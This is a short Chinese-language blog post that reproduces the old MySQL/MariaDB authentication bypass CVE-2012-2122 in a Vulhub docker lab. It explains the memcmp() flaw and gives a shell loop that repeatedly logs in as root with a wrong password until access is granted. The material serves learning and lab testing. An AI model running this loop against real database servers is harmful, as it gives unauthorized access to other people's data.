【SQL】CVE-2012-2122 MySQL身份認證繞過漏洞復現
阿新 • • 發佈:2021-10-11
漏洞簡介
當連線 MariaDB / MySQL 時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是
memcmp()
返回一個非零值,也會使 MySQL 認為兩個密碼是相同的。
也就是說,只要知道使用者名稱,不斷嘗試就能夠直接登入 SQL 資料庫。
漏洞靶場
Vulhub 中的 mysql/CVE-2012-2122
模組,在 vulhub/mysql/CVE-2012-2122
目錄下使用 docker-compose up -d
命令啟動容器:
docker-compose up -d
漏洞復現
首先在 Kali 中嘗試以正常的方式連線資料庫,預設使用者名稱為 root
,密碼為 123456
mysql -h xxx.xxx.xxx.xxx -uroot -p123456
經測試,可以正常連線。
接下來繼續在 Kali 中使用如下命令,迴圈多次發起連線請求:
for i in `seq 1 1000`; do mysql -uroot -pwrong -h <your-ip> -P3306 ; done
最終在多次嘗試後成功進入到資料庫中:
(っ °Д °;)っ溫馨提示:使用完過後不要忘了停止和刪除容器!